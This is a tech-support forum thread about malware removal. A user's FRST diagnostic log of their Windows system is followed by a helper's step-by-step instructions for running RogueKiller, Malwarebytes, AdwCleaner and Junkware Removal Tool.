    BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation)
    BHO: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre1.8.0_60\bin\ssv.dll [2015-09-05] (Oracle Corporation)
    BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
    BHO: Panda Security Toolbar -> {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} -> C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll [2014-05-05] ()
    BHO: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre1.8.0_60\bin\jp2ssv.dll [2015-09-05] (Oracle Corporation)
    BHO-x32: IDM integration (IDMIEHlprObj Class) -> {0055C089-8582-441B-A0BF-17B458C2A3A8} -> C:\Program Files (x86)\Internet Download Manager\IDMIECC.dll [2013-01-29] (Internet Download Manager, Tonec Inc.)
    BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2010-03-25] (Microsoft Corporation)
    BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-02-28] (Microsoft Corporation)
    BHO-x32: Panda Security Toolbar -> {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} -> C:\Program Files (x86)\pandasecuritytb\pandasecurityDx.dll [2014-05-05] ()
    Toolbar: HKLM - Panda Security Toolbar - {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} - C:\Program Files (x86)\pandasecuritytb\pandasecurityDx64.dll [2014-05-05] ()
    Toolbar: HKLM-x32 - Panda Security Toolbar - {B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} - C:\Program Files (x86)\pandasecuritytb\pandasecurityDx.dll [2014-05-05] ()

    FireFox:
    ========
    FF ProfilePath: C:\Users\WELCOME\AppData\Roaming\Mozilla\Firefox\Profiles\kesxh4v3.default
    FF Plugin: @java.com/DTPlugin,version=11.60.2 -> C:\Program Files\Java\jre1.8.0_60\bin\dtplugin\npDeployJava1.dll [2015-09-05] (Oracle Corporation)
    FF Plugin: @java.com/JavaPlugin,version=11.60.2 -> C:\Program Files\Java\jre1.8.0_60\bin\plugin2\npjp2.dll [2015-09-05] (Oracle Corporation)
    FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin: @videolan.org/vlc,version=2.2.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2015-04-16] (VideoLAN)
    FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2014-04-28] (Adobe Systems)
    FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2013-04-08] ()
    FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2014-06-06] (Google, Inc.)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-09-16] (Intel Corporation)
    FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-09-16] (Intel Corporation)
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
    FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
    FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
    FF Plugin-x32: @Nero.com/KM -> C:\PROGRA~2\COMMON~1\Nero\BROWSE~1\NPBROW~1.DLL [2013-08-20] (Nero AG)
    FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
    FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
    FF Plugin-x32: @videolan.org/vlc,version=2.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2015-04-13] (VideoLAN)
    FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2014-04-28] (Adobe Systems)
    FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npwachk.dll [2011-12-09] (Nullsoft, Inc.)
    FF Extension: SaveFrom.net - helper - C:\Users\WELCOME\AppData\Roaming\Mozilla\Firefox\Profiles\kesxh4v3.default\Extensions\helper-sig@savefrom.net.xpi [2016-03-05]
    FF Extension: Panda Security Toolbar - C:\Users\WELCOME\AppData\Roaming\Mozilla\Firefox\Profiles\kesxh4v3.default\Extensions\{B821BF60-5C2D-41EB-92DC-3E4CCD3A22E4} [2015-10-19] [not signed]
    FF HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\Firefox\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\WELCOME\AppData\Roaming\IDM\idmmzcc5
    FF Extension: IDM CC - C:\Users\WELCOME\AppData\Roaming\IDM\idmmzcc5 [2015-09-06] [not signed]
    FF HKU\S-1-5-21-3006523739-2206101463-1198655294-1000\...\SeaMonkey\Extensions: [mozilla_cc@internetdownloadmanager.com] - C:\Users\WELCOME\AppData\Roaming\IDM\idmmzcc5

    Chrome:
    =======
    CHR HomePage: Default -> hxxp://www.google.com
    CHR Profile: C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default
    CHR Extension: (Google Docs) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-10-13]
    CHR Extension: (Google Drive) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-17]
    CHR Extension: (YouTube) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-10-13]
    CHR Extension: (Google Search) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-17]
    CHR Extension: (Google Docs Offline) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-01-19]
    CHR Extension: (AdBlock) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\gighmmpiobklfepjocnamgkkbiglidom [2016-03-11]
    CHR Extension: (Google Keep - notes and lists) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\hmjkmjkepdijhoojdojkdfohbdgmmhki [2016-03-08]
    CHR Extension: (IDM Integration) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\jmolcgpienlcieaajfkkdamlngancncm [2015-09-07]
    CHR Extension: (FromDocToPDF) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk [2016-02-11]
    CHR Extension: (Chrome Web Store Payments) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-10-13]
    CHR Extension: (Universe) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\oecmlnmneeeeiccpcohlffnipjhngmdk [2015-12-21]
    CHR Extension: (Gmail) - C:\Users\WELCOME\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-10-13]
    CHR HKLM-x32\...\Chrome\Extension: [jmolcgpienlcieaajfkkdamlngancncm] - C:\Program Files (x86)\Internet Download Manager\IDMGCExt.crx [2013-01-29]

    ==================== Services (Whitelisted) ========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 AdAppMgrSvc; C:\Program Files (x86)\Common Files\Autodesk Shared\AppManager\R1\AdAppMgrSvc.exe [576904 2013-12-22] (Autodesk Inc.)
    S2 BstHdAndroidSvc; C:\Program Files (x86)\BlueStacks\HD-Service.exe [409304 2014-10-07] (BlueStack Systems, Inc.)
    R2 BstHdLogRotatorSvc; C:\Program Files (x86)\BlueStacks\HD-LogRotatorService.exe [388824 2014-10-07] (BlueStack Systems, Inc.)
    R2 BstHdUpdaterSvc; C:\Program Files (x86)\BlueStacks\HD-UpdaterService.exe [782040 2014-10-07] (BlueStack Systems, Inc.)
    R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [355232 2015-08-09] (Intel Corporation)
    R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel(R) Corporation) [File not signed]
    S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel(R) Corporation)
    R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)
    R2 mitsijm2015; C:\Program Files\Autodesk\Inventor 2015\Moldflow\bin\mitsijm.exe [968480 2013-10-12] (Autodesk, Inc.)
    R2 MyWiFiRouterDHCP; C:\Program Files (x86)\Wi-Fi\WiFiGxSvc.exe [47464 2014-11-18] ()
    R2 NanoServiceMain; C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSANHost.exe [141560 2014-05-05] (Panda Security, S.L.)
    R2 PandaAgent; C:\Program Files (x86)\Panda Security\Panda Devices Agent\AgentSvc.exe [61688 2014-05-22] (Panda Security, S.L.)
    R2 panda_url_filteringService; C:\ProgramData\Panda Security URL Filtering\Panda_URL_Filteringb.exe [244792 2014-05-05] (Visicom Media Inc.)
    R2 PSUAService; C:\Program Files (x86)\Panda Security\Panda Cloud Antivirus\PSUAService.exe [38136 2014-05-06] (Panda Security, S.L.)
    R2 RichVideo64; C:\Program Files\CyberLink\Shared files\RichVideo64.exe [390672 2012-08-08] ()
    R2 UnsignedThemes; C:\Windows\UnsignedThemesSvc.exe [24168 2009-07-13] (The Within Network, LLC)
    R2 VideoAcceleratorService; C:\Program Files (x86)\SpeedBit Video Accelerator\VideoAcceleratorService.exe [298152 2016-01-25] (SPEEDbit)
    R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)

    ===================== Drivers (Whitelisted) ==========================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

    R2 BstHdDrv; C:\Program Files (x86)\BlueStacks\HD-Hypervisor-amd64.sys [122072 2014-10-07] (BlueStack Systems)
    R3 dtsoftbus01; C:\Windows\System32\DRIVERS\dtsoftbus01.sys [283200 2015-10-30] (DT Soft Ltd)
    S3 ebdrv; C:\Windows\system32\drivers\evbda.sys [3286016 2009-06-11] (Broadcom Corporation)
    R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
    S1 ndiskhaz; C:\Windows\System32\DRIVERS\ndiskhaz.sys [30536 2012-12-07] (Khalil Azzouzi)
    R1 NNSALPC; C:\Windows\System32\DRIVERS\NNSAlpc.sys [96800 2014-05-02] (Panda Security, S.L.)
    R1 NNSHTTP; C:\Windows\System32\DRIVERS\NNSHttp.sys [162336 2014-05-02] (Panda Security, S.L.)
    R1 NNSHTTPS; C:\Windows\System32\DRIVERS\NNSHttps.sys [112160 2014-05-02] (Panda Security, S.L.)
    R1 NNSIDS; C:\Windows\System32\DRIVERS\NNSIds.sys [115232 2014-05-02] (Panda Security, S.L.)
    R1 NNSPICC; C:\Windows\System32\DRIVERS\NNSPicc.sys [95776 2014-05-02] (Panda Security, S.L.)
    S4 NNSPIHSW; C:\Windows\System32\DRIVERS\NNSPihsw.sys [70176 2014-05-02] (Panda Security, S.L.)
    R1 NNSPOP3; C:\Windows\System32\DRIVERS\NNSPop3.sys [125984 2014-05-02] (Panda Security, S.L.)
    R1 NNSPROT; C:\Windows\System32\DRIVERS\NNSProt.sys [306720 2014-05-02] (Panda Security, S.L.)
    R1 NNSPRV; C:\Windows\System32\DRIVERS\NNSPrv.sys [169504 2014-05-02] (Panda Security, S.L.)
    R1 NNSSMTP; C:\Windows\System32\DRIVERS\NNSSmtp.sys [115744 2014-05-02] (Panda Security, S.L.)
    R1 NNSSTRM; C:\Windows\System32\DRIVERS\NNSStrm.sys [261152 2014-05-02] (Panda Security, S.L.)
    R1 NNSTLSC; C:\Windows\System32\DRIVERS\NNSTlsc.sys [109088 2014-05-02] (Panda Security, S.L.)
    R3 panda_url_filteringd; C:\ProgramData\Panda Security URL Filtering\panda_url_filteringd.sys [51288 2014-03-20] (Visicom Media Inc.)
    R2 PSINAflt; C:\Windows\System32\DRIVERS\PSINAflt.sys [160800 2014-05-05] (Panda Security, S.L.)
    R2 PSINFile; C:\Windows\System32\DRIVERS\PSINFile.sys [119840 2014-05-05] (Panda Security, S.L.)
    R1 PSINKNC; C:\Windows\System32\DRIVERS\psinknc.sys [195616 2014-05-05] (Panda Security, S.L.)
    R2 PSINProc; C:\Windows\System32\DRIVERS\PSINProc.sys [121888 2014-05-05] (Panda Security, S.L.)
    R2 PSINProt; C:\Windows\System32\DRIVERS\PSINProt.sys [132128 2014-05-06] (Panda Security, S.L.)
    R2 PSINReg; C:\Windows\System32\DRIVERS\PSINReg.sys [106016 2014-05-05] (Panda Security, S.L.)
    R3 PSKMAD; C:\Windows\System32\DRIVERS\PSKMAD.sys [60400 2014-03-25] (Panda Security, S.L.)
    R3 RtlWlanu; C:\Windows\System32\DRIVERS\rtwlanu.sys [1528976 2013-03-05] (Realtek Semiconductor Corporation )
    R0 sptd; C:\Windows\System32\Drivers\sptd.sys [564792 2015-09-07] (Duplex Secure Ltd.)
    R1 txwifinat; C:\Windows\System32\DRIVERS\txwifinat64.sys [35248 2014-12-01] (Nanjing Tongxiang Network Technology Co.,LTD)
    R2 uxpatch; C:\Windows\system32\drivers\uxpatch.sys [30568 2009-07-13] ()
    U3 as0b3ev6; C:\Windows\System32\Drivers\as0b3ev6.sys [0 ] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
    S3 cpuz136; \??\C:\Windows\TEMP\cpuz136\cpuz136_x64.sys [X]
    S3 gdrv; \??\C:\Windows\gdrv.sys [X]
    S3 VGPU; System32\drivers\rdvgkmd.sys [X]

    ==================== NetSvcs (Whitelisted) ===================

    (If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


    ==================== One Month Created files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-03-13 13:19 - 2016-03-13 13:19 - 00022537 _____ C:\Users\WELCOME\Desktop\FRST.txt
    2016-03-13 13:19 - 2016-03-13 13:19 - 00000000 ____D C:\FRST
    2016-03-13 13:17 - 2016-03-13 13:17 - 02374144 _____ (Farbar) C:\Users\WELCOME\Desktop\FRST64.exe
    2016-03-11 22:45 - 2016-03-11 22:45 - 00000000 ____D C:\Users\WELCOME\AppData\LocalLow\uTorrent
    2016-03-10 11:33 - 2016-03-13 01:30 - 00000973 _____ C:\Users\WELCOME\AppData\Roaming\vol.bat
    2016-03-10 11:33 - 2014-11-15 21:57 - 00001159 _____ C:\Users\WELCOME\AppData\Roaming\movie.bat
    2016-03-09 13:11 - 2016-03-09 13:20 - 00043167 _____ C:\Users\WELCOME\Documents\Tolerance Charts.pptx
    2016-03-07 17:19 - 2016-03-07 17:22 - 18976341 _____ C:\Users\WELCOME\Downloads\Vedalam - Aaluma Doluma Video _ Ajith Kumar _ Anirudh Ravichander.mp4
    2016-03-05 23:25 - 2016-03-05 23:25 - 00001106 _____ C:\Users\Public\Desktop\SoundWire Server.lnk
    2016-03-05 23:25 - 2016-03-05 23:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SoundWire Server
    2016-03-05 23:25 - 2016-03-05 23:25 - 00000000 ____D C:\Program Files (x86)\SoundWire Server
    2016-03-04 12:33 - 2014-03-25 18:45 - 00060400 _____ (Panda Security, S.L.) C:\Windows\system32\Drivers\PSKMAD.sys
    2016-03-02 19:11 - 2016-03-02 19:11 - 02763510 _____ C:\Users\WELCOME\Downloads\AlugGZOk9JOlIOSO1YSKNGdRDwvXPEcHdTaAboPG5vCN.mp4
    2016-03-02 19:04 - 2016-03-02 19:04 - 00174476 _____ C:\Users\WELCOME\Downloads\AoGLgA0pK7iTgAJqt8T4-6DN7IJ4ma5cbvA7wK1nzfYU.mp4
    2016-03-02 19:02 - 2016-03-02 19:02 - 01557550 _____ C:\Users\WELCOME\Downloads\Mr. Popo eats Kamehameha Wave.mp4
    2016-03-02 18:04 - 2016-03-02 18:04 - 00000000 ____D C:\Users\WELCOME\Documents\FFOutput
    2016-03-02 18:04 - 2016-03-02 18:04 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\FormatFactory
    2016-03-02 18:04 - 2016-03-02 18:04 - 00000000 ____D C:\Program Files (x86)\FreeTime
    2016-03-02 18:04 - 2002-12-06 11:32 - 00272896 _____ (Progressive Networks) C:\Windows\SysWOW64\pncrt.dll
    2016-03-02 17:59 - 2016-03-02 17:59 - 00000000 ____D C:\Users\WELCOME\Documents\NeroVideo
    2016-03-02 17:54 - 2016-03-02 17:54 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\8320
    2016-02-29 13:12 - 2016-02-29 13:16 - 12924386 _____ C:\Users\WELCOME\Downloads\Leonardo DiCaprio Wins The Oscar (HD) Best Actor.mp4
    2016-02-27 01:00 - 2016-02-27 01:00 - 00000000 ____D C:\Program Files (x86)\FreeAlarmClock
    2016-02-26 20:33 - 2016-02-29 18:19 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    2016-02-26 20:32 - 2016-02-26 20:32 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Google Chrome
    2016-02-26 19:51 - 2016-02-26 19:54 - 28456560 _____ C:\Users\WELCOME\Downloads\Sachin - Vaadi Vaadi ( Tamil HD movie video songs 720p ).mp4
    2016-02-26 18:47 - 2016-02-26 18:56 - 23297419 _____ C:\Users\WELCOME\Downloads\Athichudi or Aathichudi Song HQ - TN 07 AL 4777 - DVD.mp4
    2016-02-16 17:37 - 2016-02-16 17:38 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\pim
    2016-02-16 15:50 - 2016-02-16 16:35 - 00000000 ____D C:\Program Files\Recuva
    2016-02-15 11:26 - 2016-02-15 11:27 - 00000000 ____D C:\Users\WELCOME\Desktop\Creo
    2016-02-14 15:56 - 2016-02-14 15:56 - 00655460 _____ C:\Users\WELCOME\Downloads\12692719_1043970192333271_904805262_n.mp4
    2016-02-13 23:59 - 2016-02-23 23:10 - 00000000 ____D C:\ProgramData\SP_FT_Logs

    ==================== One Month Modified files and folders ========

    (If an entry is included in the fixlist, the file/folder will be moved.)

    2016-03-13 13:19 - 2015-10-19 15:57 - 00000000 ____D C:\ProgramData\Bitmeter2
    2016-03-13 12:37 - 2015-10-22 21:52 - 00000000 ____D C:\Users\WELCOME\Documents\AirDroid
    2016-03-13 12:35 - 2015-09-05 19:04 - 00000898 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
    2016-03-13 12:34 - 2009-07-14 10:15 - 00029168 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
    2016-03-13 12:34 - 2009-07-14 10:15 - 00029168 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
    2016-03-13 01:39 - 2016-01-01 08:42 - 00000000 ____D C:\Program Files (x86)\Wi-Fi
    2016-03-13 01:39 - 2015-12-31 14:54 - 00000432 _____ C:\Windows\system32\Drivers\etc\hosts.ics
    2016-03-13 01:13 - 2015-10-19 21:57 - 00000000 ____D C:\ProgramData\Panda Security URL Filtering
    2016-03-12 23:50 - 2015-09-05 21:25 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\vlc
    2016-03-12 21:12 - 2015-09-06 00:03 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\IDM
    2016-03-12 18:35 - 2015-09-05 19:04 - 00000894 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
    2016-03-12 08:00 - 2015-12-13 18:40 - 00000386 ____H C:\Windows\Tasks\{A0F80D69-4945-4230-AF59-AE70922D543C}.job
    2016-03-11 22:57 - 2015-09-06 00:03 - 00000000 ____D C:\Users\WELCOME\Downloads\Video
    2016-03-11 22:54 - 2009-07-14 08:50 - 00000000 ____D C:\Windows\system32\NDF
    2016-03-11 22:50 - 2016-02-07 19:32 - 00700612 _____ C:\Windows\system32\perfh007.dat
    2016-03-11 22:50 - 2016-02-07 19:32 - 00152388 _____ C:\Windows\system32\perfc007.dat
    2016-03-11 22:50 - 2009-07-14 10:43 - 01618320 _____ C:\Windows\system32\PerfStringBackup.INI
    2016-03-11 22:50 - 2009-07-14 08:50 - 00000000 ____D C:\Windows\inf
    2016-03-11 22:45 - 2015-12-03 20:43 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\uTorrent
    2016-03-11 22:45 - 2015-09-05 19:06 - 00000000 __SHD C:\Users\WELCOME\IntelGraphicsProfiles
    2016-03-11 22:44 - 2009-07-14 10:38 - 00000006 ____H C:\Windows\Tasks\SA.DAT
    2016-03-11 03:35 - 2015-09-06 00:03 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\DMCache
    2016-03-06 13:34 - 2015-09-06 00:03 - 00000000 ____D C:\Users\WELCOME\Downloads\Compressed
    2016-03-03 23:37 - 2015-12-12 18:09 - 00000000 ____D C:\Users\WELCOME\Downloads\Images
    2016-03-02 17:59 - 2015-09-05 21:23 - 00000000 ____D C:\Users\WELCOME\AppData\Local\Nero
    2016-03-02 17:59 - 2015-09-05 19:43 - 00000000 ____D C:\Users\WELCOME\AppData\Roaming\Nero
    2016-03-02 17:59 - 2015-09-05 19:39 - 00000000 ____D C:\ProgramData\Nero
    2016-03-02 17:47 - 2016-01-25 19:36 - 00000000 ____D C:\Windows\Minidump
    2016-02-28 13:02 - 2015-09-07 19:09 - 00000000 ____D C:\Users\WELCOME\AppData\Local\Sony
    2016-02-26 08:49 - 2015-12-19 12:00 - 00000000 ____D C:\Windows\rescache
    2016-02-23 17:46 - 2015-09-05 21:08 - 00000000 ____D C:\Users\WELCOME
    2016-02-23 15:56 - 2015-09-05 21:08 - 00000000 ____D C:\Users\WELCOME\AppData\Local\VirtualStore
    2016-02-20 16:37 - 2015-09-05 19:04 - 00002216 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
    2016-02-17 17:52 - 2009-07-14 10:38 - 00032620 _____ C:\Windows\Tasks\SCHEDLGU.TXT
    2016-02-16 15:50 - 2015-12-23 12:31 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Recuva
    2016-02-15 20:36 - 2016-01-14 23:44 - 00000000 ____D C:\Users\WELCOME\AppData\Local\Pushbullet
    2016-02-14 00:12 - 2015-10-22 21:51 - 00000000 ____D C:\Program Files (x86)\AirDroid

    ==================== Files in the root of some directories =======

    2016-03-10 11:33 - 2014-11-15 21:57 - 0001159 _____ () C:\Users\WELCOME\AppData\Roaming\movie.bat
    2015-11-16 18:27 - 2015-11-16 18:27 - 0012638 _____ () C:\Users\WELCOME\AppData\Roaming\UserTile.png
    2016-03-10 11:33 - 2016-03-13 01:30 - 0000973 _____ () C:\Users\WELCOME\AppData\Roaming\vol.bat
    2015-09-07 19:36 - 2015-10-19 23:48 - 0007597 _____ () C:\Users\WELCOME\AppData\Local\resmon.resmoncfg
    2016-02-07 13:17 - 2016-02-07 19:09 - 0002289 _____ () C:\ProgramData\hpzinstall.log

    Files to move or delete:
    ====================
    C:\Windows\Tasks\{A0F80D69-4945-4230-AF59-AE70922D543C}.job


    Some files in TEMP:
    ====================
    C:\Users\Guest\AppData\Local\Temp\cdo3470569912.dll


    ==================== Bamital & volsnap =================

    (There is no automatic fix for files that do not pass verification.)

    C:\Windows\system32\winlogon.exe => File is digitally signed
    C:\Windows\system32\wininit.exe => File is digitally signed
    C:\Windows\SysWOW64\wininit.exe => File is digitally signed
    C:\Windows\explorer.exe => File is digitally signed
    C:\Windows\SysWOW64\explorer.exe => File is digitally signed
    C:\Windows\system32\svchost.exe => File is digitally signed
    C:\Windows\SysWOW64\svchost.exe => File is digitally signed
    C:\Windows\system32\services.exe => File is digitally signed
    C:\Windows\system32\User32.dll => File is digitally signed
    C:\Windows\SysWOW64\User32.dll => File is digitally signed
    C:\Windows\system32\userinit.exe => File is digitally signed
    C:\Windows\SysWOW64\userinit.exe => File is digitally signed
    C:\Windows\system32\rpcss.dll => File is digitally signed
    C:\Windows\system32\dnsapi.dll => File is digitally signed
    C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
    C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed


    LastRegBack: 2016-03-11 15:39

    ==================== End of FRST.txt ============================
     
  7. Broni

    Broni Malware Annihilator Posts: 52,898   +344

    Download RogueKiller from one of the following links and save it to your Desktop:

    Link 1
    Link 2
    • Close all the running programs
    • Windows Vista/7/8 users: right click on RogueKiller.exe, click Run as Administrator
    • Otherwise just double-click on RogueKiller.exe
    • Pre-scan will start. Let it finish.
    • Click on SCAN button.
    • Wait until the Status box shows Scan Finished
    • Click on Delete.
    • Wait until the Status box shows Deleting Finished.
    • Click on Report and copy/paste the content of the Notepad into your next reply.
    • RKreport.txt could also be found on your desktop.
    • If more than one log is produced post all logs.
    • If RogueKiller has been blocked, do not hesitate to try a few more times. If it really won't run, rename it to winlogon.exe (or winlogon.com) and try again.
    Please download Malwarebytes Anti-Malware (MBAM) to your desktop.
    NOTE: If you already have MBAM 2.0 installed, scroll down.
    • Double-click mbam-setup-2.0.0.1000.exe and follow the prompts to install the program.
    • At the end, be sure a checkmark is placed next to the following:
    • Launch Malwarebytes Anti-Malware
    • A 14 day trial of the Premium features is pre-selected. You may deselect this if you wish, and it will not diminish the scanning and removal capabilities of the program.
    • Click Finish.
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.
    If you already have MBAM 2.0 installed:
    • On the Dashboard, click the 'Update Now >>' link
    • After the update completes, click the 'Scan Now >>' button.
    • Or, on the Dashboard, click the Scan Now >> button.
    • If an update is available, click the Update Now button.
    • A Threat Scan will begin.
    • When the scan is complete, if there have been detections, click Apply Actions to allow MBAM to clean what was detected.
    • In most cases, a restart will be required.
    • Wait for the prompt to restart the computer to appear, then click on Yes.
    How to get logs:
    (Export log to save as txt)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Export'.
    • Click 'Text file (*.txt)'
    • In the Save File dialog box which appears, click on Desktop.
    • In the File name: box type a name for your scan log.
    • A message box named 'File Saved' should appear stating "Your file has been successfully exported".
    • Click Ok
    • Attach that saved log to your next reply.
    (Copy to clipboard for pasting into forum replies or tickets)
    • After the restart once you are back at your desktop, open MBAM once more.
    • Click on the History tab > Application Logs.
    • Double click on the Scan Log which shows the Date and time of the scan just performed.
    • Click 'Copy to Clipboard'
    • Paste the contents of the clipboard into your reply.
    Please download AdwCleaner by Xplode onto your desktop.
    • Close all open programs and internet browsers.
    • Double click on adwcleaner.exe to run the tool.
    • Click on Scan button.
    • When the scan has finished click on Clean button.
    • Your computer will be rebooted automatically. A text file will open after the restart.
    • Please post the contents of that logfile with your next reply.
    • You can find the logfile at C:\AdwCleaner[S1].txt as well.
    Please download Junkware Removal Tool to your desktop.
    • Shut down your protection software now to avoid potential conflicts.
    • Run the tool by double-clicking it. If you are using Windows Vista, 7, or 8, instead of double-clicking, right-click JRT.exe and select "Run as Administrator".
    • The tool will open and start scanning your system.
    • Please be patient as this can take a while to complete depending on your system's specifications.
    • On completion, a log (JRT.txt) is saved to your desktop and will automatically open.
    • Post the contents of JRT.txt into your next message.
     
